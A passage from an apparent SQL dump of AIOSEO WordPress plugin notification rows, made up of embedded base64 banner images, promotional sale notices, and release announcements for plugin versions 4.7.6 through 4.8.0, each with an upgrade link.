S+JPTZNhjK6bDTujLi2wCjFc16CbemizaJSBHAHwnikBAjFrsEgUu2JggJPiSJIVQWuZHgNIWnaC0+X6WM3SJ79l2eP65F0soJI9wCO+KEeyorawzPyLrqmiQKSX29TQqwuCRQIQeo9SXC1XB6PqLsBSZEVetw9qD9pCKqOW6Jyy4X4DqMU6UIPEFKOBlQjgv4RA9B7oGDQZIiC9icque9wxIp4U5mQhCF9+79K/nnaPUxNQ563y/+3JP+6JQciBvRYbZP/SFMPhgOy/PtGihTCFBWQSGeEQ/iY35SeUI6CRoFRPm93eqhgVJz9xGAYkOfaRwpOadVnGDHAA1JA1Ci4Ft24GHTKxUjHN+a2MOplEUgTurNTwj6OfyOpGRWIFYS1SbqehDTDi30WkzBxS10MqIwgOEX9LtdlP2oSwhoqqannCL0bA2kgC2kiD9A1QoEY6PpzBk4So6BQjVlVrqqKKSFn8g6j4HL4xDUKgo9+3jl2hv5UFsYW7gAIihDaFWX4/7M1CmpL/qvkXwxhDNFX2+X/W5T/0G73wtEe+Y9asm7iZKVykSLV2ygsZBoa5okiUegPXB8R6wv4vo5CsISoU5Bowx8jnpzNozl+t/51x17B/5y0/A8rNr1jfy7tvPOiI6dHYT+K6F6HlxlRKE0xpeTM1xSpyUQM6AEMqgoN1eo7sAykI2VAOCAhQof+E9i2kU6+gR2nKtYFyUmkopjCfEzulTEAfqOurXSBQvHImEcj6K2jq1i962rUxeIPyjsLiAVRtxV2jqrRnCoQ5f5gegEZGCVGYAmR6z51naj4NxR2PEWFC1KBQvI0LloMOGqAopvDYktFqfONy7/UAVG0cgzEc1c18Nvl/5uX/yBc0CH5L9yh09l9hnEirm9hMYbyn+uLAlFD2AThpWkWUfh8QBF7MTUaKuwyRoJEkNB4FYVQKpqxRUVHAopyTmA6FGnNRohoHPOba/BFsmHcSvKpI6yRni/OgKoXUgd1gJUJfg4yn6iEWwXIiCLsgCDMWkzhjRjZNUzUxBxWklw2opsQuAxcJkpMuHBWbb1gBr375jNC/mLvRCO4iVRGGKEMKVBUiBE2Jd6gvpu0GgNqDL2H3VjS1RxE3QRC8xqp7aexn0Sif+2qGl44DRANK3Qd15c0XeeKpm9H/lE6JWu4VoL888Rul/9vTP5f3vQOAHy47VOe9jc+22C/0KdLceEOndoo/4U77HR22WGRU1HLf64/vpxwBowV0l7QddcO0HagmTuQk6iu2FwdIEJvE2M6YJLsOAtC0MIbxTcxTEHE9glIk8cca0qQhF78aYUaI4IBtS4Y1NkV2RWo5iQSfEchCWEOgYAOjsNsIUSRxcxQtLcHRnKAjgyUAU+omErYd/PEdNovcgqU0wheHeRYYL97ZaOhfF5SA2w8Cs4/ek6KI6tw6dbpE5IElUbnbLBMr0oggKdiMPJX9KiXkE89LLYXIi4dblP95wyIQ+oQC2Cji5qg8FuSf1eMx1eSPFqDWBXP7Hb5/wblf+KyP0R0ztWvPmF/mDtk4v5d9/i65D9XWfsCd9COg5G8BBOICRiHIm0WJdQVtG+y0Z+ETqyShkVM+FtC4ptB4L4PnRx9JkRVC8e+OjAx2p5aDmkG3DEPiKsf165WFBSBka/HmTcwmBbwUhvtLE0hLBvDulFUsXYhpNBvp75uOFSvb4JAEVgMQgIni4aYM7Uo053EKh9RtcqEAPAoLp5mWY2QtiQsbsiPo5VpYvmP8u6DkUVIA8MHRWb7W5L/kJMfKbDvdGdqcNyv2+X/G5X/7B/fxfbrkf//B3I3INupfxPeAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1185\" />\n\n<p><strong>Cyber Monday is here!</strong> The deals are still hot! 🔥</p>\n\n<p><strong>Save up to 70%</strong> on AIOSEO. It\'s the perfect time to level up your SEO game.</p>\n\n<p><strong>Why choose AIOSEO?</strong></p>\n\n<ul class=\"wp-block-list\">\n<li><strong>Easy-to-use:</strong> No technical expertise required.</li>\n\n<li><strong>Powerful features:</strong> Advanced SEO tools at your fingertips.</li>\n\n<li><strong>Expert support:</strong> Get help from our SEO pros.</li>\n</ul>\n\n<p><strong>Don\'t miss out!</strong> Upgrade your plan or purchase a new license today.</p>','success','[\"4-x\",\"lite\"]',1184,NULL,'2024-12-02 00:00:00','2024-12-06 00:00:00','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=black-friday-24-v4-x-lite',NULL,NULL,0,0,'2024-12-05 18:53:44','2024-12-05 18:53:44'),(41,'675bfd3251f44','BuddyPress, Web Stories, and Enhanced Author SEO — An All in One Update! 🚀!','<p>We just released AIOSEO 4.7.6 and it’s loaded with some exciting updates!</p>\n\n<p>The top ones include:<br><br>🤩 <strong>BuddyPress Integration:</strong> Fully optimize SEO settings for BuddyPress content types, including user profiles, activity streams, and more.<br>🤩 <strong>Google Web Stories Integration:</strong> Take full control of your SEO settings for Web Stories, resulting in more eyeballs on your content.<br>🤩 <strong>Author SEO Improvements:</strong> Effortlessly showcase Google\'s E-E-A-T guidelines and boost your site\'s credibility.</p>\n\n<p>Update to AIOSEO 4.7.6 now and take your SEO to another level 💪🏼</p>','success','[\"4-x\",\"lite\"]',1192,NULL,'2024-12-12 00:00:00',NULL,'Learn More','https://aioseo.com/new-aioseo-4-7-6-buddypress-web-stories-integration-author-seo-improvements?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=476-v4-x-lite','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=476-v4-x-lite',0,0,'2024-12-13 09:24:02','2026-05-20 05:14:43'),(42,'678fb355802cb','❄️ Winter Sale is Here! AIOSEO Up to 70% Off ☃️','<img src=\"data:image/webp;base64,iVBORw0KGgoAAAANSUhEUgAAAyAAAAB4CAMAAAA9m2ZdAAAAPFBMVEUAQaP////v9vze7vvE3/iszO+HvO+Iq9lTpvBfisgljewSg+o8b7kBe+kBdeEBaM8RVbAAPpoBOo4ANIPzLHBWAAAACXBIWXMAABYlAAAWJQFJUiTwAAAZo0lEQVR42u1di7ajKgztUcFHFdH+/7+ObwWSELQ9bc+QO507q1VUyCbZIcTbLUqU/0G0ztJM69gR/7cW5HlUAVDqtMzTskxj9/zXUgqRx16w+mTqES3SLBXp8u8ydksESJRZ8gkV3YCQdMVHGgHy33oSZfQhYISMuJARH1GiYAjJJ2BEfESJAiJkAkjER5QoMEJGgPwiPspSd3+Z7tZRrb6eIdV6/swIGQCy4kPX6w+vkW5oXIj69neVKB8fL8qT9fWXY2ydzPQtEytCBoCs+MjErUxfeS9C6kGDyr+rREJ8W6xcfwVAxO/2SZZpvSEkTbMVH1ldpkK/9FHlMBv84fWWWnzZkvQ3DIbOf3dGLXORZtNnlGxEyPIvMcBF5uWLJ4OAIakHlyWPPstrxyOugFiSeiR7JQepR3xwVb4UQnyf0/JlPqGMneDEBMo0G3hHXo4yQkJM/xKpLAdv65VxmDAOUotFog15nfsS+xbmICsZH3OxsvHf3fjvcvzpJa5u6XKQ2ueu5ytAYp5QlN+UMYq1ZWKN2bxb1okYwPMSbZQrKHaXqfZ6vys+ohcQ5XctiF6ie9P6Rz59Zljo+ccXXPKAkO0fHuvebQARccyi/KbMS9ndvD6Yz3+91o3pNoQsuKgZzCK6WFHeakjm9cF8+dujhRfJ+4aQGRgcfHSRpEd5oxVZ80vy9X85CaarE/mKkIl51Dylj2HeKO+2HwMrT7esE5+3Uz4BIVMuFtcoxIXCKO+SHR8pAyHnuUCdz5+VqQ/Y2PBRlvOHQZiiRPldKdf8K5nma15WSXpYJwEynFXPZ042RIx/FnwMeCmjAxXlg6UWekp398V28/NkuRzQUYrNhuztvBUfehPoy9OtgVfwSOAp2HNMUutnhOn1mK6X/PykmXh6XkVgH4f3yNMhMtbF8t+nPEdBujIfsCWnzygzQKZ/jvRi+pyBiBY/m4A1i7o8mX+Fluu7+nC6WHu4TPYm28NZh+/htf9O/jhHHG/QI1v35wnn8OM91OAZSSbyC4qdm7eeSp4G1inVR2vHZ3u7/l1Q3domLcZoPTuWVU/ZvJpx4LmdVFL45cRYymMHVap1ppF805amdfvP6PdGTQfUx++K5csRH+b3wGDkRmvzEXx8DPc/32LJPPy+3YOmEJWcMs41dOOSoYF79xUKP/zY8aJRnnZ1yuuRAhrjJxm8TMi0fFEC1oSrcmQd02eUyVWT87/X78/MdYnZP4OYna2PGmv/aKpi1qjxv9bE3PDVclZmqMrwrYORxGxtbKwOwMeg8WqQNuMdnYwPNN+DD1Jp6OaUGsF1Wnk1MD1OLkMXaBpFc182NEa4U0bRTCP4mizCiYO8cpfPkWrUx4WNWkg9fs40+uMAZBiVwyBKEyCbSgEGZOzdAQ3N8cu0mXR2Gj9TU5bGjuNvjLpoJmgVAfjIpjNUxTxcNM0CaYYblxYBaqNzvJ1q7F+eLsvxecwOB21t1cy9jLcr2CZ46vUXYaTMXrrQYOFj/LPnZW0BrksAqVYMbNOI/nEBso9w6aq8aipbCacxVraqV3tz+gb6YJNkAQCZL8bGlNyeteFwFqm4aqOpmx4RQmDk6AzJrYsczydzLKFqlMI0u0sDZpi5R15lR14ZLqq3TQfT+sfw2TMX6/kTLimglAsKlEVRGkNa7OQCblFJUD33xqx5bgFQGgCQ5WIyYLqcb41nc4TiuR914tHCRZ1b0BEBZpd9OADHd2lwOwzyyeqgGWZpp0G8u68IKY90fPxrQ8hpaoMCZBBtDoT5YwMakEEEbCdsVc+sS1kUZGmuCqEgYZhKmsWDYUNKqqP5PO3vF9a8cONo/tpHGAU5mvcrFKQ5OBEwhL8FH3Mu1mWEpA6jPo6IJACiEeuTQqhpmrvLqC0TUgOTWRgFmW7/zj8cxDQBqUotOniJDx8u7DQkCYC0BAU5anZ7iYLQLX0RPuZs3u4iQmwLYgLE5NW2BYENSAXbbFfVpWWPQAoSEuQNxNTh+gn3Ckphmh3izRSwWXDOTs3haCkKgjYZQEFSb0vfhI91P8hFhJAAkRRAatiAIBTEdWMcH+s6BVGnKEiAH3dXq3/etOcXHCSqhNbZGEAoR2yaawi/jUVBsJa+CR+lmAO712wIaUHaHwogGTz5YBQk+/H5WOlzKEjQKkgQq99VW2H+Rxbo3A3tEO7ZvYGPJCiI2WAoBVGelr5ADvhYEDLakPolFkSQAElgU4FY/zvtaQyDoS9SkBS9EBXSDPPjxLGD9NkFucl1UoBhSElOoFgUBDBt4TYVa+kLpNzyE8ds3qkIQ6fPlySmolj29G32XgEbEDYFsX0DkIIU4R5WwT68WRlFGgJCtau29jlYiZRFUeSOWZkXNJfLqz3rjZxCGtVPYpNuhzj0/XZgEAWRe48sQ7I09I37JOSyH+QyjSIAIn4ojxg5sUCsPzCLJYYHocFpsTByzewcqaPMaTKNmejykyEiin0Or6wExUlSxC9bVtLgGTa3Ft8HezapXJGCU82ijrrHqIIVdu8fk3goSPdYpAMpSIL1iJxDu4cJoLdb+i5T8pQSDIQFqX4ogCAGpJFsCmL7WCkVT4Foz93yvYFjZGO51c7hjbXEn22tVgXgepmnd1RnisP9VQnYippzFhYNlD5SsAKEpiAPW61rayHfJ6ttax/fDJDySUVKMlRjBQkQDFgpEoD0Rk0qMp4CBgCUO7TmhVIcH4cZHAsr3JtK/JBupn70KANJxwbgecMK344q3YMBYmkeuNgG0xUrbOKwqTVIQQoSGuv1pp5xW/qcUFXpYxUTB8mfgBCB9V4Fxzg9BuSOWP/CE0jCw8PzqHdauQEA1TpDfK+o2RWaLIHkygb3DE0T1JrKI9DZ/15A8QE1p4ZMlqG/pZ548MAJFoDQFMRR68w+XBHThjrEBNaG+k/Dx5TKrhkc5AnvB0EB4voXlfIbkAAKQl2vAkZ9wIhjZNyhllB2MokR2HQp2DUE3BlsdUKh8Jemi6Umy1D6FyYW3e94FKTHF00UaVjXjN7HpwKk5hVBfE65fWzWA1YgDgDBDEiDmfPMu2JGLg7Pkxnse6/RoKYdJUOyk9fkCVdg07U2WpFrzf0RITXkHSmwX5TzdGCoKQMBcoWCSJNmrL0GiO4/loIsdRB96v+ccuIYQAQJEJTaY2qe+Bbr7iQFmQerxIzM6GrN8/ADS3qaVL7dB30XdFFhSh/vE2gCXhW/P06wFjWYE2KX2bqgmFFn3wUNkDKMguREvvbaa7S8JDf99QB50sKjOb/cieyLHSCoAQmiIKzw8HHUBZmB5M6uNs4UhI9HireqlH5kUIvr/NsfZ1hhP4KaN2lMGZTZ/taYyvT1p1Zu+Ioi2Q3WYjuLghw5uWbgo3+Nk3Q+/UP/ZhldBCCCBAhqQDA1L7xZSdJHQXDrcPS9mbPrcXr0mC5BIfd21KDUzPw1vTv90K3h4at9pRAzIE4y1nzHyVUKAh3+qwC5quFjCPe33tAHA6QiMxFQAxJIQY4np4HWAfG9BQNnptQe05UBjtNmR/rjZP3jLBNuO49m49WvGFHrt2qJhWE5wHcA4E+gIMDhhDyfgpRXfSRd/1qVUBggggQIvriImfPEl/5zJ+e5B01BkNk1hak+l4IsrSaUQ2OokBODOsQIVuO1Y2T/TZtuHpGM9VQKgtrU11OQ/ItKqYMeRJVSo4UbkAZR88qbHvsbFKQBKYgnenaDH0kZkdAeBMhwBwVgvHrT1xqNS8nZObJe7goFuXNs6uspSPnel9VoGeCfgQCR5HSGG5CwVZCjyslA6/AaCpK5kCrhR1JGiz20mWNxtCrn2sPRup05yBh27h63lAeQGeFkN9yeTkHY+Cglvzy6fOu7BvKAa3cSUADYgKx6SxgQjIIQ+eT3i6sgBAUprCVCDQx6V3pMF4/UuF1pe1o3yGPpAS/Pl4x1hYJkVvhMPZFo1CFeky7zN75rIA/x7iCASNIhJvJ/gynIdknPPH6GggyaOcq9WkXrbv7vgSXguq3SBsYACL7bNisOxxq97xoxbzLWFQqSFEN/7B1S3dceeUJGex4amXrf8qMuA4xX7morYkAW9SEMSDgFWQ8LpSBIBhJzb+mxBC1lupR+kBR391DmtvB5YAxptb3LeHvagEDJWMw4HehCE7tjLgdNv+otsQHgBDiIJEMqhAEJpyCrj/UKCkJulloLsdEuel9SeSa7h9ID2bw2RO6qaW+2R+/4TP5krAsUhL7QxUJx+R99CaZrQSoy5kgZkBMUZLlmRlgHdXIVxLO3dK5vRbeqE9KAtLY65r4HtYuh9A87xJt6ck00GaejKQgNkItFees/+hJM6bi8klyzoArNYRFF85x74upAEkhBCgYFwSXZCz+RFMScKoSd+OjO1/Tu77nasKGEvfVcaWV2ogsQJgXpOJC1WxrXL89jpM7lH3zJX+cABDUgk/5QBgRTczufXDobb4tQ63CJghxz2inTVST0Vjw3ZARsK7eva9YGtUO8wwAIOhnrNRTETP3UtyiwizUW7ZBkJ1IGhJWIVTjFpQvcN2NTkFsQBZHe5MrxJ0kuSRjq2B3TjBgX3ksGmYhKHcLmACQNoiA3Zo9kf6Fi3C+4WANAcAMyAoQ0IKxErMqJ+goWBdFPpiCeBfy7TMh4kpkbbDnjjCuvVkQ7IJRkMtbrKAhaKPvrpdbPBIikRldRBoRFQRKXtCf2ftTTFCQNpCCWNu6LDoUNj4U/YGkadpw9T/0zdet2f+YmPtvJWK+kIN9eEQvLK7kWe87NESIMyNCLORn1ZFIQJ/k9TUKtw/0SBcmwMilFVQwiRQIEaRucgUDZGLVMfZqonMBw5exed5KxfoGC/DGA1Be3VplzjLAK15gKlJGzDqtk3DRL35OQyey3KAi1iAHUyrnRaRodjJFjHSJlpW/NVqogk7FSVrbyhlhmWO9vVK1G876uLM6QYZeKqnPrdCprFaTyls9lWAcJ+97h/kTBxodqiDxYdLm2FECv7fvBW9uAqMYFiJE7xcxWvkZBvrRqNe5kPS+K9UOyZ09UR/AoiKIV80KabniRf3nafrTMfNcyhfiPApNCxejgFRmVjBVIQcqTFORPcfSL6yA56ZhmfAPCpyCka3OegtzY2rBN4bxa7PeGimDRibCdhquOTo2IEHeQVxvpFAURc9kLorxvXAdB7G7GNyB8ChLULmAdWBRESESqQ9WFMMaC4MOjRTrBAFKFOz8kBdE0BUmxHin24it2S120IDkZ2cj4BqTgUxDKt3kSBfEX5R0gwqAgCVSq06yV0wX1cMNMUQMng+rCKggQiAPqFCMtRQuCzF0Z24AozotzEm/46AIFyVyu4ykfKE/RDwsfXjekRtZgWBGCjDUJcShI0XBk8j7bCBCGBamoSc41IDplUJDMW+bkfLESe2vToXggJn4K4sfH6O/nmyuTlJ53MGfNVnGRFVMwk7GuUJCKM2fMVuSDq1Z/jgURpBfgGpCaR0F88aPzFARIXPcpRMJgAA7KrOpzndmFqZszbm/qXVpkvvbJeAj63Z0kBUktL4qCSP+xVas/yIJUFEAAA4KZc2R1pAqiIB0j/I/s/VvfdaFdKRkEXanWtERW9dJRhZzq8CZGgBtTDZmygHUIk4L0kOkSdo80GpP+EQGCzG9OfwquAemxjRVYQbj0lRTkx/IZpmP66b/9D2PlXYzv+DjUQHTr5Nj5hulcIPuIkRTsmTNJIJyNyUwKMr5zYeuQ/a9H/+KScX8GIBU1jIABeSABSDSfXLKWdBWjuNussz0DZ5aIEIo8hUEVgA8rVrTN0StGLAqi+CFeR7FJCuIQhy68yuRvVK3+GwAR5DwHGJBbGAXBYjhPpSC+Cps2BUmdNxMmRninheyH3YP3zWxN+/Owl0CKMwBh1EY6+kUp6/DfLRn3VwBSUeMIGRAmBVEehswIUIVREKJknJn8mxV34IErw4S04ASbo+m6A0KsX9ekLv7bew99dmfsCvBTkLdWrf4rABHkRAcYENQJwic9yaEgt3MUhFVhs4SeuPghUqFa0AHJca+saXK4X/kvnj7cQUGthHooiDxTlDdSEAwgJJWEDIihnzgFUR4f60kUZE63UiEUpIJXMAUBkC2d2jrlvoeYqwzuV/kTABB4ShHWSo+HgmRzLfl3V63+IwARZDYEZECCKQjsYzGsQ8qoWj0cBUtW3mAKgq1gplilzoP7YQfKUzm/SKWSGaLsZog3K0wR2Jxhmp0EecZtdxDv8Fz30cEKBUhFAQQ0IHXYKgjW9hkKwtoLkiyfn/tWLwFy0ZVTs+KOlIfv6R4cNI/IWxGWkRr3kN2HP/MHK/zD2N2VzDCcwmeae7j65Comdf6BABGkEkMGhEVBfqjsRmqLXM0wMtyo0Kjwc1VFmNgoK/5awOWvO3+gHO+5ysohJF/Um4Xu7pqLC7WavxfEXtn8rAn8AwFSUQABDQiTgpjibrzlWAc4/N8ztWEpb64GjCCrBNZdmSwdKkDd6VA2Ab95W8EA2Z08GaLx/EDykuz+odWw6g8EiCDdINCA9CcoCLBf6AwFuUEUhLO9AttakRGYbUHvXHCxOb9xraDnG9tUYG9s9ySnqLASL+oD7cgEjre7WDVJBCTPgNScuEtBpm89cRWEteyG5jVJbKlwZ+kdKxnB6rg7XIjVcbCUrkEWdA8wkgFL9dnRgqnPKmciy0+AKennSJYBOUVBGt2/h4J4tlZUFGg7CCCaMVnvG0skiXcnJAi/+M5vJItQx29Ndf+oVPPyAwFSUQCBDQj6nj9PfpTwUJCeS0EeodMlUO4RCT8X0KKL1wo7F77DBbHdcim9vcRfBFOQoFyWjy4Zpz/AhtQkUZYsA8KkIMp2V8pgCpK8nILYqgWtpTsrBD7llXuoStAGRDtwL05REO7hyadWxCpLnX+EDalJHiBZBuQUBWmd2BNjjVww6pJeoyC2c5JBa+lWH3aaVMdE7ovYxnWTCt6rBLKUF1OQTwPIYDzKXGstPwwgoqEAAhsQNFHQmx8lQinIxarVDApis+HEfY2mm4PRUTXds+Nm14wyquucAB0UyClOUZAPqog1v47nne+KRgBSUQBBDIihn6m/UtbOd/OLFESdpSB36p1vGbGWfoOz+Dp0Z2ZmvGvXE+KF8L4AJJCCyG+nIFrUg5f1ARZEkxOK5BgQY0CPWaYJca5yttIi/Du3MvSgNN2Eqw1bep8gkCkJLdZompKWMDxY5VnNx7EssmoVW+PTZdlPnvWwlopxb0/kLWtdfgQH6fJsz1xzi6QdfszQAa0zq4W1LsH2fSbh2p37xd3Wl8Y7IbJF5L1ZV9vM5KgyS/2yXmHJs91v+W4VM7gfumQ86Zg126IA6QaIGOQhme63NRBdZFR3rim2nTgOyZSGqyrOI6ayWgDCPHzu0MOzd5+V6v4RKyGdbhVcR2x0KfrDr3iBj75VaDUyu6iMMrI2Oufi63DtVTq0woq/7ZnZLaumzZoYiJaEWvRUt5bqqqV9RSWCd7e6lBOchSyqhltnB8iFtG9gUmLeE7KLl+zX3jfdq4/aC6I/YR1kuRVEv9pZQVu4e40K53YTat6AoG8w/Lo9L9a9uHKqdGy3oI5IMzZB6DZEKea6Hm3j6uHy0LfWPKeddaj3qY9u6YpcAw0+3iiyR6M7PPK6JZ5R6cvCuwrpDrNkXMQHCyO3bRJv6Qq1PdZEB0/vynums0XOnlSb1ikFxcXIfg89gJHDQ9uYb9WNMb8St7GUfQANXu/sVTre3Kjv7Zhl2V6aA2hI6U8CyGfkYpED25omgjIgq1hNtKAnpYAygOvFFVoo0MUIUOEsACMaBr+BXbu5pSxWf84kt4fdSXaPGN3ZwY88o7cPUPqee7j6zJJx9ae9WHp2EBbRgInYpNXY7mUNttAdT4bf7wcf0cM3OMymPXL94zMAch/FvIfDKU6rZpfwJ1htUadW25VEbm0Ld2ePjkm7GzeGtB3/8FahHfrWaNbtM6Un9yf3vN3LyCF47efO+RmfzHr/9ZHKHXWZlxq5AtpqF75dux8mBT1WkWvHLVo9ueu787cOH9I/eNKFHf4pelh/C0B68tfOP6I98n3nvXYXhD4GQKjqHfgzhxf86ALUsPdPCTBAHmEa//gygHys9GSH9azuxIDQezStC2685z2EHyAdd1JguSAdu+xUFwz3wDmgP3V4FC5A+jNzPOaueJ0jzlh1oTcQPpF3hH7yNKjjVp1itQ2dHWgkT9jUKBzdCvr1NAUJ8Dc4FOQWPl0SrXZnfJCON0d3rKavcIovpSCfK/R8yXM3TlIQvw9mH9OfmL9DKQhzlnfuoee4MD1r9n6CxkcK8hKA9GcIgDF4PTLQvVcVev8N9rdLFqRnttqd80FciLiZgLx3gnbAUV2Ywnd/Dx/1u/J9u03IHztOE8zvQ44IfAZcfqMr+30BDr4g73agu+7CnrH7kC6ZVLt+wu4sWYqyvEWJ8uekFuIJeSRaioiPKH8UIE/YLpiXoo4IifIXRYqLiVbj+QPM5OCplXnszyh/LhJ02QZNCBnxIXXszihRAITUIuIjShQUIQNAIj6iRLFES51PDlYpJnyUZR1pSJQoG0BKOYCjrkshBisy7mAQdbQjUT7PyclF/o5df1K4goR76zhKUd5HAkZ5hwoOPtXkWs2XH/wtWSO+mJBxnKK8SfIJIG/w/nV5K6f47sDTJ4TMheZgCEffK8qb5M0FdAd+Xot5PYRwxiJ7j/LfWZAVH9M6CI2QaD+i/IccZMHHQEJqH0KiRHmXdC+PYv0D71MAKdNR1WsAAAAASUVORK5CYII=\" alt=\"\" class=\"wp-image-1207\"/>\n\n<p>⛷️ Winter Savings Alert! </p>\n\n<p>Save up to 70% on AIOSEO and give your site the SEO boost it deserves! </p>\n\n<p>Need a new plan, or thinking of upgrading? </p>\n\n<p>🔓 Unlock powerful pro-level features and dominate search results! Don’t miss out—start the year right—save BIG!</p>\n\n<p></p>','success','[\"4-x\",\"lite\"]',1201,NULL,'2025-01-20 00:00:00','2025-01-27 00:00:00','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=winter-sale-25-v4-x-lite',NULL,NULL,0,0,'2025-01-21 14:46:45','2025-01-21 14:46:45'),(43,'67a588163e336','[New] Smarter Keyword Rank Tracking & WooCommerce SEO Made Easy!🤩','<p>We just released AIOSEO 4.7.8 and it’s loaded with some exciting updates!</p>\n\n<p>The top ones include:</p>\n\n<p>👉🏼 <strong>Smarter Keyword Rank Tracker</strong>: Our Keyword Rank Tracker just got some massive upgrades you don’t want to miss. Now you can get related keywords, import keywords from GSC and more.</p>\n\n<p>👉🏼 <strong>Support for WooCommerce Product Attributes</strong>: Setting product attributes in WordPress just got way easier. Plus, you can also export product attributes! </p>\n\n<p>Update to AIOSEO 4.7.8 now and take your SEO to another level.</p>','success','[\"4-x\",\"lite\"]',1213,NULL,'2025-01-28 00:00:00',NULL,'Learn More','https://aioseo.com/smarter-keyword-rank-tracking-woocommerce-seo-made-easy/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=478-v4-x-lite','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=478-v4-x-lite',0,0,'2025-02-07 04:12:06','2026-05-20 05:14:43'),(44,'67afcd6ee153d','💘 Fall in Love with Better SEO: AIOSEO Valentine\'s Flash Sale!','<p>This Valentine\'s Day, stop settling for \"meh\" rankings and give your site the love it deserves with AIOSEO! ❤️</p>\n\n<p>For a limited time, grab AIOSEO at up to 70% OFF!</p>\n\n<p>That’s right, we’re spreading the love with a flash sale on the #1 WordPress SEO plugin. Whether you\'re upgrading or starting fresh, everyone feels the love! 💝</p>\n\n<p>But hurry, this offer vanishes faster than a box of chocolates on February 15th! 🍫</p>\n\n<p></p>','success','[\"4-x\",\"lite\"]',1218,NULL,'2025-02-14 00:00:00','2025-02-16 00:00:00','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=valentine-sale-2025-v4-x-lite',NULL,NULL,0,0,'2025-02-14 23:10:38','2025-02-14 23:10:38'),(45,'67d12b3ad52d8','[New] Supercharged Crawl Cleanup and Query Arg Monitoring! 🚀','<p>Is your WordPress site slowing down? Or are AI bots scraping your content? 🧐</p>\n\n<p><strong>AIOSEO 4.8.0 puts you in control with</strong>:<br>🧹 <strong>Supercharged Crawl Cleanup</strong> – Stop search engines from indexing unnecessary URLs.<br>📊 <strong>Advanced Query Monitoring</strong> – Optimize UTM parameters automatically.<br>🛡️ <strong>Bot Control</strong> – Block unauthorized AI crawlers.<br>🔍 <strong>Internal Search Optimization</strong> – Prevent spam & boost performance.<br><br>🔥 Keep your site fast, secure, and SEO-friendly. Update now! 🚀</p>','success','[\"4-x\",\"lite\"]',1222,NULL,'2025-03-11 00:00:00',NULL,'Learn More','https://aioseo.com/introducing-aioseo-4-8-0-advanced-crawl-features/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=480-v4-x-lite','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=480-v4-x-lite',0,0,'2025-03-12 06:35:38','2026-05-20 05:14:43'),(46,'67d88455f3dfc','🍀 St. Patrick\'s Day FLASH SALE - Up to 70% Off AIOSEO Today Only!','<img src=\"data:image/webp;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAABaCAMAAABT79jMAAAAV1BMVEWlzHaFr2gydjxCgUMjajUMVSgQXyxMjUVws0xQlz9gqUVepUJ0t1Rorjx0uTyXzFd+v0TwkjK3hiyKfSd2oIbI2qyNr5r///+v04Ph7Zdqml36/qSawHK0QBzSAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAZEElEQVR42t2dCWOjOq+G4z1AM53vTmnB9f//nVfyTljC5qQ9nDkzbRII2A+S/Foyl/+FTar68Ka4VH8fbFdO38/aKm66521Ekid+m5HVae3E+fVRt/xRklfHAZABp8uJYDXwH5O8eRpX7+/0mWQ9FSzD2XnN9Jc+IqvhkkH3He3+MmC5g8MZXpe44n9PBOud0/8oWJSf2Ux/l23WlYI9cP13rPuLgIXE1g1Qy3n1LK6gxdR/Eix1ejstkGW9YOM68FD3N1Uhi9XY/yvg//ocrt7fa6n/g2BpWZ/cTvNkoY9p8h480P0lLFbjscKtgiD++hSuIIDf3t1EMbpj44Lv2Y0y/crA/QFZf5gN2pujFsv5q0IxVuam8XSfwtX7O9sYwBv2+fXc7ZNtPEOuCrTTJFmVhKA9679jzrCcxWrCyTUNvQ/iC3GFAfxlU1j89fxtE1kXzou0E5D1584L0ugFm4NYuf1Lxlj+BJt7UetPKa42BvD68wVgteyFgXvc3oZk/fFB+zBC/mkxVjMIstxPuahVjqv39+uWAJ59vWL7IBsC92uphvorM7KsF2wmIuT9vV8qxsrcoTvHyopajWLqxss117YA/jVgfYq1kSApELhntyC/Qm80VrqizcSQvvlpMVYcVCR32NhJHs4kU1SW5Or9Xa0P4PWLwBLSvC5wT95QSg69oaJ0NbIIh0TMiRjr30nKe33nEsFoYVBD+XvRjfO1AfzHS8BqhRB0VeBOi7bTX4431qfMpKu7APmAO0RX+C+A9X9u+wdfVRXZuLItK6trya2RjKzb1lus9vOz9T/ZbfDSdoslxIqzY7wp2k6VtKejeJnOZlL+c0BdZPHNjcKo/CFbZrGE+LRd3qI9EVJHAgS+Y3/i2WufXx/4D8U7XvDW7++4oX5/7T76xe0/egiW+AGX78SWj+Lfc2kq/5+sbkU26i0WeNpryT9qpS/XuXvKwYJ+z8D6+Ar/xtfCxz6/uPwQCiDiA2zw1zmwOvz14QmqJ7SSs1i0TGdXsvI8XZqwyepPka1xMZaU6q3sxmQNtv7twf/XGYv10QIT1tu1XEjwex/4KxXSfxbe/VL4EhirL/zDksGC3eXnJ8ff8SDoNbmgznnm6Knr8snVxdvoCiMpG2MV6uxKBpzKg6XA/MLYkFQwDinbapTfVkQZMxbLuj4HCreWiCFTQFeEUANm1BEG74nPZLA+HJIS9sB3W3sM+tV+TYE1v9WcF+YKxoLQFThGV78eLCUropQ2l4uhktUlm63mdAVYMxaLaRkgCmBx92YAA80Q8z996M8swqJuT4RKe5fIh57QjgofgUV50eZ5q6lU5mK0UnCXq18OFnB1iZuGu6Voy0m222K54GkWLLRA7i/t+YP3W2YH7wEs9JRzYK2wWErWhb0gJbErCpH1NLAGXIHRAltcsvWguTaABTaHfbmoCDo9CQkOLOsFmafIuUmF3pG7sAtfAQtmg/sPxyQSFbCzxm2TK1RlA6yK80FX6CJkPQusO64QLV7UHyr5SAaqM1cI2DCGOLTJrUWwMCIHu6OCefLyufSGCMkBA+b4kd6Vfs6C1T0CqynKFXhBaoY9UcRmPQmsMVfOH1YlA/h6vcXyHrCdBMuJVjKF7s7nJWkLx4x